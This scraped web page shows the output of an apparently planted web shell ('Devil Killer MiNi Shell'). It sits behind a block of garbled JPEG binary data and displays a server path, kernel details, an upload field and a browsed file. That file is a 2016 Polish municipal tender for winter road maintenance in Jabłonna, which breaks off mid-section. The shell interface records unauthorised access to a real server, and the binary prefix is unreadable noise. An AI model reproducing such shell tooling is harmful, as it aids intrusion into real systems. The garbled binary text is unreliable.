JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161028/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161028/333312-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='ugjablonna.bip.lubelskie.pl' target='_blank'>ugjablonna.bip.lubelskie.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 333312 - 2016
              z dnia 2016-10-28 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Jabłonna: Zimowe utrzymanie dróg w sezonie zimowym 2016/2017 na terenie sołectw Gminy Jabłonna<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              nieobowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Urząd Gminy w Jabłonnie, krajowy numer identyfikacyjny
              53516100000, ul.
              Majątek 
              22,
              23114  
              Jabłonna, woj.
              lubelskie, państwo
              Polska, tel.
              815 610 577, e-mail
              , faks
              815 610 065.
              <br />
              Adres strony internetowej (URL): jablonna.lubelskie.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />ugjablonna.bip.lubelskie.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />forma pisemna<br />
                Adres:
                <br />Jabłonna-Majątek 22, 23-114 Jabłonna</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Zimowe utrzymanie dróg w sezonie zimowym 2016/2017 na terenie sołectw Gminy Jabłonna<br /><b>Numer referencyjny: </b><br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b><br />5<br /><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Zamówienie składa się z pięciu części, a jego przedmiotem zamówienia jest świadczenie usług polegających na zimowym utrzymaniu dróg w sezonie zima: 2016/17, a w szczególności: odśnieżanie dróg gminnych w okresach opadów śniegu i zamieci śnieżnych, jak również usuwanie błota pośniegowego, posypywanie mieszanką piaskowo solną dróg i placów na terenie sołectw gminy zapewniając ciągłość ruchu drogowego. Wykonawca może składać oferty na wszystkie części zamówienia. 
Usługi polegać będą na: 
- odśnieżaniu dróg o nawierzchni bitumicznej ,tłuczniowej , tłuczniowo  gruntowej,
- posypywaniu mieszanką piaskowo  solną miejsc szczególnie niebezpiecznych (skrzyżowania, zakręty, wzniesienia) w ciągu dróg gminnych oraz placów na terenie Gminy Jabłonna.
- utrzymaniu w gotowości sprzętu i maszyn przewidzianych do realizacji umowy wraz z ich obsługą; 
- zapewnienie przez Wykonawcę we własnym zakresie obsługi naprawczo-remontowej sprzętu przewidzianego do świadczenia usług,
Oprócz czynności podstawowych, do obowiązków Wykonawcy należy także niezwłoczne przekazywanie (za pośrednictwem osób obsługujących pojazdy i sprzęt) osobom upoważnionym ze strony Zamawiającego informacji o: 
- aktualnym stanie przejezdności dróg, 
- czasie rozpoczęcia i zakończenia wykonania usług na poszczególnych odcinkach dróg. 
- zagrożeniach spowodowanych warunkami atmosferycznymi, 
- innych zdarzeniach zauważonych na drodze. 
W związku z powyższym każda maszyna przy odśnieżaniu będzie wyposażona w urządzenia GPS, który Wykonawca na czas trwania umowy otrzyma od Zamawiającego.
Zamawiający dopuszcza składanie ofert częściowych w podziale na 5 części:
Część 1 zamówienia obejmuje: 
	Odśnieżanie dróg gminnych i placów w  miejscowości: Skrzynice Pierwsze, Skrzynice Drugie, Wolnica, Majdan Chmielowski, Chmiel Pierwszy.
	Posypywanie własną mieszanką piaskowo solną miejsc szczególnie niebezpiecznych (skrzyżowania, zakręty, wzniesienia) w ciągu dróg gminnych oraz  placów na terenie Gminy Jabłonna.
Część 2 zamówienia obejmuje: 
Odśnieżanie dróg gminnych w  miejscowości: Czerniejów, Czerniejów - Kolonia, Skrzynice - Kolonia,  Jabłonna  Majątek, Tuszów.
Część 3 zamówienia obejmuje: 
Odśnieżanie dróg gminnych i placów w  miejscowości: Jabłonna Druga, Wierciszów (prawa strona drogi wojewódzkiej nr 835).
Część 4 zamówienia obejmuje: 
Odśnieżanie dróg gminnych i placów  w  miejscowości: Jabłonna Pierwsza, Jabłonna Druga (lewa strona drogi wojewódzkiej nr 835).
Część 5 zamówienia obejmuje: 
Odśnieżanie dróg gminnych i placów w  miejscowości: Piotrków Pierwszy, Piotrków Drugi, Piotrków  Kolonia.
Obszar miejscowości zgodnie z załącznikiem mapowym.
UWAGA! Wszystkie 5 części zamówienia obejmują wszystkie drogi będące w administrowaniu Gminy Jabłonna w danym sołectwie. Drogi wewnętrzne nie będące własnością gminy nie podlegają odśnieżaniu.
Zamawiający zastrzega sobie prawo zmiany obszarów odśnieżania na poszczególnych zadaniach. 
Wykonawca zobowiązany jest wykazać się odpowiednim potencjałem technicznym gwarantującym  należyte wykonanie zamówienia w trudnych warunkach zimowych. Uznaje się, że warunek potencjału technicznego zostanie spełniony, jeżeli Wykonawca dysponuje lub będzie dysponował n/w sprzętem: 
Część 1 zamówienia: 
Minimum 1 pługiem dziobowym ciężkim oraz nośnikiem pługa  lub minimum 1 pługiem prostym oraz nośnikiem pługa. 
Minimum 1 piaskarką oraz nośnikiem piaskarki.
Część 2 zamówienia: 
Minimum 1 pługiem dziobowym ciężkim oraz nośnikiem pługa.
Część 3 zamówienia: 
minimum 1 pługiem dziobowym ciężkim oraz nośnikiem pługa.  
Część 4 zamówienia: 
Minimum 1 pługiem dziobowym ciężkim oraz nośnikiem pługa  lub minimum 1 pługiem prostym oraz nośnikiem pługa. 
Część 5 zamówienia: 
Minimum 1 pługiem dziobowym ciężkim oraz nośnikiem pługa  
Nośnikami pługów i piaskarki mogą być samochody lub koparki o mocy min. 100KM, koparko  ładowarki o mocy min. 100KM , obowiązkowy napęd na dwie lub więcej osi.
Wykonawca/operator, z którym zostanie zawarta umowa musi posiadać telefon komórkowy z uwagi na wymaganą całodobową dyspozycyjność. 
Zamawiający zastrzega sobie prawo umieszczenia w pojeździe systemu monitorowania pracy sprzętu (lokalizator GPS).
Wykonawca ponosi pełną odpowiedzialność za jakość, terminowość oraz bezpieczeństwo robót wykonywanych przez siebie.
Wymagania w zakresie zimowego utrzymania dróg:
Odśnieżanie drogi na całej szerokości jezdni a w przypadku wystąpienia dużych opadów śniegu, w porozumieniu z Zamawiającym, odśnieżanie jednego pasa ruchu  pod warunkiem wykonania, co 150  300m, mijanek znajdujących się w zasięgu widoczności kierowców. Długość mijanki co najmniej 150 mb. Na jezdni dopuszcza się występowanie cienkiej warstwy zajeżdżonego śniegu o grubości nie utrudniającej ruchu.
Odśnieżenie placów na całej szerokości. Na placu dopuszcza się występowanie cienkiej warstwy zajeżdżonego śniegu o grubości nie utrudniającej ruchu.
Posypywanie własną mieszanką piaskowo solną miejsc szczególnie niebezpiecznych (skrzyżowania, zakręty, wzniesienia) w ciągu dróg gminnych oraz  placów na terenie Gminy Jabłonna  część I zamówienia.
Utrzymanie w gotowości sprzętu przewidzianego do realizacji zamówienia wraz z obsługą.
Rozpoczęcie prac nie później niż po jednej lub dwóch godzinach po otrzymaniu zlecenia w zależności od wskazanej w formularzu ofertowym opcji dla kryterium Termin rozpoczęcia prac od momentu zlecenia
W przypadku niedotrzymania terminu jednorazowego odśnieżania dróg gminnych lub awarii pojazdu wykonującego usługi Wykonawca zapewni na własny koszt zastępczy pojazd.
W przypadku awarii sprzętu Wykonawca zobowiązany jest najpóźniej w ciągu 2 godzin podstawić sprzęt zastępczy.  
Cena podana w ofercie powinna obejmować wszystkie koszty i składniki związane z realizacją zamówienia, konieczne do poniesienia celem terminowej i prawidłowej realizacji przedmiotu zamówienia oraz wymaganiami stawianymi przez Zamawiającego, w szczególności:
a)	Koszty pracy sprzętu 
b)	Koszty pracy kierowcy
c)	Utrzymanie sprzętu w gotowości

UWAGA: zimowe utrzymanie drogi obejmuje odśnieżenie drogi na całej szerokości jezdni.
Cena oferty oraz pozostałe kryteria wyboru oferty nie ulegną zmianie w okresie na jaki zostanie zawarta umowa.
Do faktury należy każdorazowo załączyć kartę drogową (raport drogowy) z potwierdzoną ilością wykonanych usług w okresie rozliczeniowym, przez sołtysa miejscowości, na terenie której wykonano usługę lub inną osobę upoważnioną.
UWAGA! Przed podpisaniem umowy z Wykonawcą Zamawiający w wyznaczonym przez siebie terminie dokona przeglądu gotowości sprzętu do odśnieżania.

<br /><br /><b>II.5) Główny kod CPV: </b>90620000-9<br /><b> Dodatkowe kody CPV:</b>90630000-2<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 15/04/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Jako spełniający warunki udziału w postępowaniu zostaną ocenieni wykonawcy, którzy w zakresie warunku określonego w pkt 5.1 wykażą dysponowaniem następującego sprzętu:
Część 1 zamówienia: 
Minimum 1 pługiem dziobowym ciężkim oraz nośnikiem pługa  lub minimum 1 pługiem prostym oraz nośnikiem pługa. 
Minimum 1 piaskarką oraz nośnikiem piaskarki.
Część 2 zamówienia: 
Minimum 1 pługiem dziobowym ciężkim oraz nośnikiem pługa.
Część 3 zamówienia: 
minimum 1 pługiem dziobowym ciężkim oraz nośnikiem pługa.  
Część 4 zamówienia: 
Minimum 1 pługiem dziobowym ciężkim oraz nośnikiem pługa  lub minimum 1 pługiem prostym oraz nośnikiem pługa. 
Część 5 zamówienia: 
Minimum 1 pługiem dziobowym ciężkim oraz nośnikiem pługa  
Nośnikami pługów i piaskarki mogą być samochody lub koparki o mocy min. 100KM, koparko  ładowarki o mocy min. 100KM , obowiązkowy napęd na dwie lub więcej osi.Zamawiający żąda, aby Wykonawca dysponował oddzielnym sprzętem na realizację każdej z części zamówienia, na którą ofertę składa. Każda z części zamówienia musi mieć zapewniony oddzielny sprzęt do jej realizacji.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu w stosownych sytuacjach polegać na zdolnościach technicznych lub zawodowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków prawnych.  Wykonawca, który polega na zdolnościach innych podmiotów, musi udowodnić zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególności przedstawiając zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia.  Zamawiający oceni, czy udostępniane wykonawcy przez inne podmioty zdolności techniczne lub zawodowe, pozwalają na wykazanie przez wykonawcę spełniania warunków udziału w postępowaniu oraz zbada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia. 
</div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 3 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">Zamawiający działając na podstawie art. 26 ust. 2 ustawy odstępuje od żądania dokumentów potwierdzających okoliczności, o których mowa w art. 25 ust. 1 pkt 3 ustawy PZP.</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />Wykaz sprzętu  wg wzoru stanowiącego załącznik nr 4 do SIWZ<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Wykonawca, w terminie 3 dni od dnia zamieszczenia na stronie internetowej informacji z otwarcia ofert (o której mowa w art. 86 ust. 5 ustawy), samodzielnie (bez odrębnego wezwania ze strony zamawiającego) przekaże zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej z innymi wykonawcami składającymi oferty w danym postępowaniu (o której mowa w art. 24 ust. 1 pkt 23 PZP)  wg załącznika Nr 4 do SIWZ. Wraz ze złożeniem oświadczenia, wykonawca może przedstawić dowody, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia.
Jeżeli wykonawca nie złoży oświadczenia, o którym mowa w sekcji 6.4, lub oświadczenie jest niekompletne, zawiera błędy lub budzi wskazane przez zamawiającego wątpliwości, zamawiający wezwie do jego złożenia, uzupełnienia lub poprawienia lub do udzielania wyjaśnień w terminie przez siebie wskazanym, chyba że mimo ich złożenia, uzupełnienia lub poprawienia lub udzielenia wyjaśnień oferta wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania.
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
